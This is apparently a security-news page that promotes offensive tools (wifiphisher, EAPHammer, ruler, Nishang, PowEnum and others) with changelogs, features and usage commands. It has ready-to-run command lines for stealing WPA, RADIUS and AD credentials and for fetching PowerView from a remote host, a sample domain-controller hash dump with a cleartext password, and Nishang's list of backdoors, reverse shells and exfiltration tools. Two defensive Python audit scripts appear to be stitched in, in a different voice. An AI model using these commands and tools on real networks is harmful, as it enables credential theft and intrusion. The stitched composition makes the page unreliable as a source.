Channel: credentials – Security List Network™

wifiphisher v1.3 – Fast automated phishing attack against WPA networks.


Changelog wifiphisher v1.3 15/4/2017:

o Introduced --quitonsuccess (-qS) option. [@javaes]
o Introduced Travis CI. [@d33tah]
o Install pylint in Travis. [@blackHatMonkey]
o Web server migration to Tornado. Fixes various bugs and increases performance. [@sophron]
o Remove DNS leases after the script restarts. [@laozi999]
o Introduced --internetinterface (-iI) option to provide Internet connectivity to victims. [@sophron]
o Added support for iOS and Android to our network manager imitation template. [@alexsalvetti]
o Introduced a new deauthentication module. [@blackHatMonkey]
o Introduced a new recon module, including new features in target AP selection phase. [@blackHatMonkey]
o Code refactoring including a more modular design. [@sophron]
o Introduced accesspoint module serving as a hostapd wrapper. [@sophron]
o Introducing Lure10, an attack for automatic association against Windows devices. [@sophron]


Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that, unlike other methods, does not involve any brute forcing. It is an easy way of obtaining WPA credentials.


From the victim’s perspective, the attack takes place in three phases:
– The victim is deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
– The victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
– The victim is served a realistic router config-looking page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.
Requirements:
– Kali Linux.
– Two network interfaces, one wireless.
– A wireless card capable of injection.

USAGE

git clone https://github.com/sophron/wifiphisher
cd wifiphisher
python wifiphisher.py -h (for help)

update:
cd wifiphisher
git pull

Download  v1.3.zip  | v1.3.tar.gz | or clone url

Source : https://github.com/sophron/wifiphisher | Our Post before


EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks.


EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full-scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration.
Features:
– Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
– Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
– Perform captive portal attacks
– Built-in Responder integration
– Support for Open networks and WPA-EAP/WPA2-EAP
– No manual configuration necessary for most attacks.
– No manual configuration necessary for installation and setup process

Dependencies:
+ python-devel vs python-dev
+ service vs systemctl
+ network-manager vs NetworkManager
+ httpd vs apache2

Usage:

git clone https://github.com/s0lst1c3/eaphammer.git && cd eaphammer
./eaphammer --cert-wizard

Stealing RADIUS Credentials From EAP Networks:
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth ttls --creds
./eaphammer --bssid 00:11:22:33:44:00 --essid h4x0r --channel 4 --wpa 2 --auth ttls --interface wlan0 --creds

Stealing AD Credentials Using Hostile Portal Attacks:
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth peap --wpa 2 --hostile-portal
./eaphammer --interface wlan0 --essid TotallyLegit --channel 1 --auth open --hostile-portal

Source: https://github.com/s0lst1c3

PytheM v0.6.7 – Penetration Testing Framework.


Changelog PytheM v0.6.7:
+ ARP spoofing improvements.
+ History completer for session.
+ Added more command-line help messages.
+ HTTP sniffer updated.
+ SSLKill as a thread.
+ Improved SSLKill integration with PytheM.


PytheM is a Python penetration testing framework.

ARPspoof mode:
+ gateway
+ targets
+ interface
+ arpmode
+ myip & mymac


Feature:
+ ARP spoofing – Man-in-the-middle HTTP
+ ARP+DNS spoof – fake page redirect to credential harvester
+ webform & SSH Brute-Force attack
+ Web page form brute-force
+ URL content buster
+ Call the voice-controlled assistant Jarvis
+ Decode a base64 url encoded cookie value.
+ pForensic a packet-analyzer.

Usage:

sudo apt-get update
sudo apt-get install build-essential python-dev tcpdump
sudo apt-get install libnetfilter-queue-dev libffi-dev libssl-dev

git clone https://github.com/m4n3dw0lf/PytheM && cd PytheM
sudo pip install -r requirements.txt 
python pythem.py -h

Update:
git pull origin master

Source: https://github.com/m4n3dw0lf | Our Post Before

adpwn – tools for Windows Active-Directory exploitation and pwning.


ADPWN is a set of tools for Windows AD exploitation and pwning. dsinternalsparser.py: this tool makes the process of dumping hashes stored in a domain controller easier and faster.
Note
* It uses the output of the DSInternals modules that retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from domain controllers.

* As mentioned on the DSInternals web page (https://www.dsinternals.com/en/), it is possible to retrieve hashes remotely, instead of the well-known method using vssadmin, ESEDBTOOLS and NTDSXtract, which is pretty slow in some cases because of the NTDS.dit size, ESEDBTOOLS misconfigurations, etc.


Requirements
– Python 2.7 environment
– DSInternals output file generated with Get-ADReplAccount or Get-ADDBAccount.

TODO:
To extract the hashes remotely:
1. Retrieve all users attributes with the DSinternals module Get-ADReplAccount, and save it to a local file.

Get-ADReplAccount -All -NamingContext 'DC=Example,DC=com' -Server DC1 -Credential $cred >> localfile.txt

The file generated has a format similar to the following.

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory: 
Enabled: True
Deleted: False
LastLogon: 
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description: 
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory: 
  Hash 01: 92937945b518814341de3f726500d4ff
  Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
  Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory: 
  Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
  Hash 02: 5a5503d0e85f58abaad3b435b51404ee
  Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
  ClearText: Pa$$w0rd
  Kerberos:
    Credentials:
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
    OldCredentials:
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
    Salt: ADATUM.COMApril
    Flags: 0
  KerberosNew:
    Credentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: a72c8bc96c4a6f03244f0b0067a1e440
        Iterations: 4096
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
        Iterations: 4096
    OldCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 034b512ec64286dec951d6aff8d81fa8
        Iterations: 4096
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
        Iterations: 4096
    OlderCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 29d536ec057f9063747161429b81f056
        Iterations: 4096
      DES_CBC_MD5
        Key: 58f1cbe6e50e1f83
        Iterations: 4096
    ServiceCredentials:
    Salt: ADATUM.COMApril
    DefaultIterationCount: 4096
    Flags: 0
  WDigest:
    Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 02: c993da396914645b356ae7816251fcb1
    Hash 03: 6b58530cab34de91189a603e22c2be15
    Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 05: 5a762cf59fa31023dcba1ebd4725b443
    Hash 06: c78bac91c0ba25cae5d44460fd65a73b
    Hash 07: 59d73cea16afd1aac6bf8acfa2768621
    Hash 08: d2be383db9469a39736d9e2136054131
    Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
    Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
    Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
    Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
    Hash 13: e899e577d5f81ef5288ab67de07fad9a
    Hash 14: 135452ab86d40c3d47ca849646d5e176
    Hash 15: a84c367eaa334d0a4cb98e36da011e0f
    Hash 16: 61a458eb70440b1a92639452f0c2c948
    Hash 17: 238f4059776c3575be534afb46be4ccf
    Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
    Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
    Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
    Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
    Hash 22: f1685383b0c131035ae264ee5bd24a8d
    Hash 23: 3119e42886b01cad00347e72d0cee594
    Hash 24: ebef7f2c730e17ded8cba1ed20122602
    Hash 25: 7d99673c9895e0b9c484e430578ee78e
    Hash 26: e1e20982753c6a1140c1a8241b23b9ea
    Hash 27: e5ec1c63e0e549e49cda218bc3752051
    Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
    Hash 29: 84010d657e6b58ce233fae2bd7644222

2. Parse the local file with dsinternalsparser.py
./dsinternalsparser.py -o dump localfile.txt
3. After execution, if no options are given, dsinternalsparser.py creates 6 files.
– NTLM File (dump_ntlm.txt): Contains username and current NTLM hash.
– NTLM History File (dump_ntlm_history.txt): Contains username and NTLM history hashes.
– LM File (dump_lm.txt): Contains username and current LM hash.
– Cleartext File (dump_cleartext.txt): Contains username and cleartext password, if it exists.
– WDigest File (dump_wdigest.txt): Contains username and WDigest history hashes.
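As an added, defender-side illustration (not ADPWN's or DSInternals' code), the following Python parses the record format shown above and, instead of dumping hashes, flags the credential-storage weaknesses the output reveals: reversibly encrypted cleartext passwords, stored LM hashes, DES Kerberos keys still issued, and a current NT hash that reappears in the password history. The sample input is constructed; its first record reuses the values from the page, the second (svc_backup) is invented.

```python
"""Audit DSInternals Get-ADReplAccount output for weak credential storage."""
from dataclasses import dataclass, field

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
DES_ETYPES = {"DES_CBC_MD5", "DES_CBC_CRC"}


@dataclass
class Account:
    sam: str = ""
    nthash: str = ""
    lmhash: str = ""
    nt_history: list = field(default_factory=list)
    cleartext: bool = False                   # a ClearText: line was present
    etypes: set = field(default_factory=set)  # current KerberosNew etypes


def parse_dsinternals(text):
    """Indent 0 = attribute, 2 = sub-block, 4 = key set, 6 = encryption type."""
    accounts, rec = [], None
    section = subsection = subsub = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        key, value = key.strip(), value.strip()
        if indent == 0 and key == "DistinguishedName":
            rec = Account()              # every record starts with its DN
            accounts.append(rec)
        if rec is None:
            continue
        if indent == 0:
            section, subsection, subsub = key, None, None
            if key == "SamAccountName":
                rec.sam = value
            elif key == "NTHash":
                rec.nthash = value.lower()
            elif key == "LMHash":
                rec.lmhash = value.lower()
        elif indent == 2:
            subsection, subsub = key, None
            if section == "NTHashHistory" and key.startswith("Hash "):
                rec.nt_history.append(value.lower())
            elif section == "SupplementalCredentials" and key == "ClearText":
                rec.cleartext = True
        elif indent == 4:
            subsub = key
        elif indent == 6 and subsection == "KerberosNew" and subsub == "Credentials":
            rec.etypes.add(key)          # current key set only, not Old/Older
    return accounts


def audit(accounts):
    """Return (SamAccountName, finding) pairs; an empty list means nothing to fix."""
    findings = []
    for a in accounts:
        if a.cleartext:
            findings.append((a.sam, "password stored with reversible encryption"))
        if a.lmhash and a.lmhash != BLANK_LM:
            findings.append((a.sam, "LM hash stored (legacy, trivially crackable)"))
        if a.etypes & DES_ETYPES:
            findings.append((a.sam, "DES Kerberos keys still issued"))
        if a.nthash and a.nthash in a.nt_history[1:]:
            findings.append((a.sam, "current password reuses one from history"))
    return findings


# Constructed sample in the format above: record 1 reuses values shown on the
# page, record 2 is invented. Key/Iterations lines are omitted (ignored anyway).
SAMPLE = """\
DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
SamAccountName: April
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory: 
  Hash 01: 92937945b518814341de3f726500d4ff
  Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
SupplementalCredentials:
  ClearText: Pa$$w0rd
  KerberosNew:
    Credentials:
      AES256_CTS_HMAC_SHA1_96
      DES_CBC_MD5
    OldCredentials:
      AES128_CTS_HMAC_SHA1_96

DistinguishedName: CN=svc_backup,OU=Services,DC=Adatum,DC=com
SamAccountName: svc_backup
NTHash: 00000000000000000000000000000001
LMHash: aad3b435b51404eeaad3b435b51404ee
NTHashHistory: 
  Hash 01: 00000000000000000000000000000001
  Hash 02: 00000000000000000000000000000002
  Hash 03: 00000000000000000000000000000001
"""

if __name__ == "__main__":
    for sam, finding in audit(parse_dsinternals(SAMPLE)):
        print(f"{sam}: {finding}")
```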

Usage:

git clone https://github.com/r4wd3r/ADPWN && cd ADPWN

wget https://raw.githubusercontent.com/r4wd3r/ADPWN/master/dsinternalsparser/dsinternalsparser.py
chmod 755 dsinternalsparser.py
python dsinternalsparser.py

Source: https://github.com/r4wd3r

RSA tool for ctf – retrieve private key from weak public key and/or uncipher data.


RSA tool for CTF – uncipher data from a weak public key and try to recover the private key. Automatic selection of the best attack for the given public key.

Attacks :
– Weak public key factorization
– Wiener’s attack
– Hastad’s attack (Small exponent attack)
– Small q (q<100,000)
– Common factor between ciphertext and modulus attack
– Fermat’s factorisation for close p and q
– Gimmicky Primes method
– Past CTF Primes method
– Self-Initializing Quadratic Sieve (SIQS) using Yafu – NEW
– Common factor attacks across multiple keys – NEW
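Two of the checks listed above, Fermat factorization for close primes and the common-factor check across multiple keys, carried out on constructed toy moduli as an added example (this is not RsaCtfTool's code; real keys use much larger primes, but the arithmetic is identical):

```python
from math import gcd, isqrt


def fermat_factor(n, max_steps=100_000):
    """Fermat's method: find a, b with n = a^2 - b^2 = (a - b)(a + b).

    Start at a = ceil(sqrt(n)) and raise a by one per step. The number of
    steps is about (p - q)^2 / (8 * sqrt(n)), so the method is only practical
    when p and q are close. Returns (p, q), or None when the budget runs out.
    """
    if n % 2 == 0:
        return 2, n // 2
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


def shared_factors(moduli):
    """Pairwise gcd over a batch of moduli (the common-factor-across-keys check).

    Returns (i, j, p) for every pair of keys that share the prime p. Quadratic
    in the number of keys, which is fine for auditing a few hundred of them.
    """
    hits = []
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = gcd(moduli[i], moduli[j])
            if 1 < g < moduli[i]:
                hits.append((i, j, g))
    return hits


def audit_moduli(moduli):
    """Run both checks; returns {key index: [finding, ...]} (empty list = clean)."""
    findings = {i: [] for i in range(len(moduli))}
    for i, j, p in shared_factors(moduli):
        findings[i].append(f"shares prime {p} with key {j}")
        findings[j].append(f"shares prime {p} with key {i}")
    for i, n in enumerate(moduli):
        pq = fermat_factor(n)
        if pq:
            findings[i].append(f"close primes: Fermat recovered {pq[0]} and {pq[1]}")
    return findings


# Constructed toy keys (all four factors are prime; real keys use ~1024-bit primes).
P, Q, R = 1_000_000_007, 1_000_000_009, 2_147_483_647
WEAK_CLOSE = P * Q        # p and q differ by 2: Fermat finishes in one step
WEAK_SHARED = Q * R       # reuses Q from WEAK_CLOSE; primes far apart
FAR_APART = 65_537 * R    # reuses R from WEAK_SHARED; Fermat gives up

if __name__ == "__main__":
    for i, fs in audit_moduli([WEAK_CLOSE, WEAK_SHARED, FAR_APART]).items():
        print(i, fs or ["no finding"])
```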


Requirements:
* GMPY
* libnum (https://github.com/hellman/libnum.git)

Todo
+ Implement multiple ciphertext handling for more attacks
+ Implement ECM factoring
+ Implement support for MultiPrime RSA (see 0ctf 2016)
+ Possibly implement Msieve support…
+ Some kind of polynomial search…

Usage:

git clone https://github.com/hellman/libnum.git && cd libnum
python setup.py install

git clone https://github.com/Ganapati/RsaCtfTool && cd RsaCtfTool
python RsaCtfTool.py --publickey ./key.pub --private

Example:
./RsaCtfTool.py --createpub --n 782837482376192871287389789773981723...12839802 --e 768557

Source: https://github.com/Ganapati

ruler v2.1.4 – A tool to abuse Exchange Services.


Latest Changelog ruler v2.1.4:
+ Fixes a few niggles with forms being displayed and deleted.
+ Restores DecodeBufferToRows to the working version.
+ Adds the --rule option that creates a new rule to auto-delete the form email as it arrives. This causes the form to trigger.
+ Adds the ability to trigger a shell through Outlook forms.


Ruler is a tool that allows you to interact with Exchange servers through the MAPI/HTTP protocol. The main aim is to abuse the client-side Outlook mail rules.
Ruler has multiple functions and more are planned. These include:
* Enumerate valid users
* View currently configured mail rules
* Create new malicious mail rules
* Delete mail rules
Ruler attempts to be semi-smart when it comes to interacting with Exchange and uses the Autodiscover service (just as your Outlook client would) to discover the relevant information.

Features:
+ Brute-force for credentials
+ The autodiscover service
+ PtH – Passing the hash
+ Display existing rules / verify account
+ Delete existing rules (clean up after yourself)
+ Popping a shell
+ Semi-Autopwn
Use, download and build from source:

git clone https://github.com/sensepost/ruler && cd ruler
go get github.com/sensepost/ruler
go get github.com/urfave/cli
go get github.com/staaldraad/go-ntlm/ntlm
go build
./ruler

Upgrade: git pull

Download: ruler-linux32  | ruler-linux64  | ruler-osx64
Source: https://github.com/sensepost | Our Post Before

needle v1.1.0 – The iOS Security Testing Framework.


Changelog needle v1.1.0 – 2017-05-05:
* Added
– [CORE] Issue Auto-Detection: modules will now automatically detect and keep track of issues in the target app. All the issues are going to be stored in the issues.db SQLite database, contained in the chosen output directory. Every issue will hold the following attributes: app, module, name, content, confidence level (‘HIGH’, ‘MEDIUM’, ‘INVESTIGATE’, ‘INFORMATIONAL’), outfile
– [CORE] New commands: issues (list all the issues identified), add_issue (manually add an issue to the collection)
– [CORE] Frida Attach or Spawn: added option in Frida modules to either attach to or spawn a process
– [CORE] New global option: skip_output_folder_check. It allows skipping the check that ensures the output folder does not already contain other files
– [MODULE] Created the device category
– [MODULE] Dependency Installer (device/dependency_installer)
– [MODULE] MDM Effective User Settings (mdm/effective_user_settings) [from @osimonnet]

* Fixed
– [CORE] Moved installation of dependencies to its own module (device/dependency_installer)
– [CORE] Frida support for 32bit devices
– [CORE] Automatic reconnection if SSH/Agent connection drops (Retry decorator)
– [CORE] Re-introduce support for ipainstaller (iOS<10)
– [MODULE] Compatibility of modules requiring app decryption (iOS 10)

* Removed
– [CORE] SETUP_DEVICE global option, in favour of device/dependency_installer


Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like “drozer” that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent.

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device.


Needle has been successfully tested on both Kali and OSX.

Usage & Download from git:

git clone https://github.com/mwrlabs/needle.git && cd needle

Kali 2.0 and Rolling:
# Unix packages
sudo apt-get install python2.7 python2.7-dev sshpass sqlite3 libimobiledevice4 libimobiledevice-utils lib32ncurses5-dev

# Python packages
sudo pip install readline
sudo pip install paramiko
sudo pip install sshtunnel
sudo pip install frida
sudo pip install mitmproxy
sudo pip install biplist

Macintosh/OSX:
# Core dependencies
brew install python
brew install libxml2
xcode-select --install

# Python packages
sudo -H pip install --upgrade --user readline
sudo -H pip install --upgrade --user paramiko
sudo -H pip install --upgrade --user sshtunnel
sudo -H pip install --upgrade --user frida
sudo -H pip install --upgrade --user biplist

# sshpass
brew install https://raw.githubusercontent.com/kadwanev/bigboybrew/master/Library/Formula/sshpass.rb

# mitmproxy
wget https://github.com/mitmproxy/mitmproxy/releases/download/v0.17.1/mitmproxy-0.17.1-osx.tar.gz
tar -xvzf mitmproxy-0.17.1-osx.tar.gz
sudo cp mitmproxy-0.17.1-osx/mitm* /usr/local/bin/

# libimobiledevice4
brew install -v --fresh automake autoconf libtool wget libimobiledevice
brew install -v --HEAD --fresh --build-from-source ideviceinstaller

Upgrade:
git pull origin master

Download: v1.1.0.zip  | v1.1.0.tar.gz
Source: https://github.com/mwrlabs | Our Post Before

DATA – Credentials Phishing Analysis and Automation.


DATA is a Python and bash script for Credential Phishing Analysis and Automation.
Script Lists:
* BUCKLEGRIPPER (py)
– Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
– Requirements can be installed by running or reviewing install_bucklegripper_deps.sh

* BULLYBLINDER (py)
– While capturing a pcap, visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
– Requirements can be installed by running or reviewing install_bullyblinder_deps.sh

* SLICKSHOES (sh)
– A basic bash script that pulls urls out of pdfs in streams or in clear view.
– The only argument to the script is the path to a folder containing the pdfs you want to process.
– REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/; its location must be set in the first line of the script


Usage:

git clone https://github.com/hadojae/DATA && cd DATA
cd bucklegripper
./install_bucklegripper_deps.sh
python2 bucklegripper.py -h
python bucklegripper.py -s openphish -r ../../test_urls.txt


cd bullyblinder
./install_bullyblinder_deps.sh
python2 bullyblinder.py

Source: https://github.com/hadojae


PowEnum – Penetration testers commonly enumerate active-directory data.


Penetration testers commonly enumerate AD data, gaining domain situational awareness and identifying soft targets. PowEnum helps automate this cartographic view of your target domain.

PowEnum executes common PowerSploit Powerview functions and combines the output into a spreadsheet for easy analysis. All network traffic is only sent to the DC(s).
Syntax Examples:
– Invoke-PowEnum
– Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
– Invoke-PowEnum -FQDN test.domain.com
– Invoke-PowEnum -Mode SYSVOL
– Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special


Detection:
This enumeration will generate suspicious traffic between the PowEnum system and the target DC(s). If there are security products watching traffic to the DC(s) (e.g. Microsoft ATA), PowEnum will likely get flagged.

Usage:

git clone https://github.com/whitehat-zero/PowEnum && cd PowEnum
Invoke-PowEnum
Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
Invoke-PowEnum -FQDN test.domain.com
Invoke-PowEnum -Mode SYSVOL
Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special

Source: https://github.com/whitehat-zero

Nishang v0.7.2 – PowerShell for penetration testing and offensive security.


Changelog Nishang v0.7.2 from v0.7.0:
0.7.2
– Added Invoke-PowershellTcpOnelineBind to the Shells directory.
0.7.1
– Added Invoke-AmsiBypass to the Bypass directory.


Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.


Scripts: Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak : Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys : Get WLAN keys in plain text from a target.
– Keylogger : Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade : Dump user passwords in plain text on Windows 8.1 and Server 2012.
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– Create-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote : Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay : Create network relays between computers.

+ Prasadhak
– Prasadhak : Check hashes of running processes against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
– Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remove persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

The Penetration Testers Framework (PTF) v1.14 codename: Tool Time.


Roadmap changelog The PenTesters Framework version 1.14 from 1.10:
* added new flag INCLUDE_ONLY_THESE_MODULES (thanks cobbr)
* remove prompt for install update all for automatic install

~~~~~~~~~~~~~~~~~
version 1.13.1
~~~~~~~~~~~~~~~~~
* fixed fedora as supported platform throwing fedora_modules error
* changed github locations for the empyre and ps-empire changes

~~~~~~~~~~~~~~~~~
version 1.13
~~~~~~~~~~~~~~~~~
* added new field for modules called TOOL_DEPEND which allows you to specify other tools that are needed in order to install prereqs. Check README.md for more information.
* added fido
* fixed sparta ln usage

~~~~~~~~~~~~~~~~~
version 1.12
~~~~~~~~~~~~~~~~~
* add stickykeyslayer


~~~~~~~~~~~~~~~~~
version 1.11
~~~~~~~~~~~~~~~~~
* add inspy (git pr)
* add gobuster (git pr)
* add wso webshell (git pr)
* depend fixes (git pr)
* added aptitude as a check for debian as well as apt


The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we’ve been accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those “go to” tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It’s all up to you.
The ultimate goal is community support on this project. We want new tools added to the github repository. Submit your modules. It’s super simple to configure and add them and only takes a few minutes.


Instructions:
First, check out the config/ptf.config file, which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move on to running PTF by typing ./ptf (or python ptf).
This will put you in a Metasploit-esque shell which has a similar look and feel for consistency. show modules, use, etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.

Update EVERYTHING!
If you want to install and/or update everything, simply do the following:

./ptf

use modules/install_update_all
run

This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.
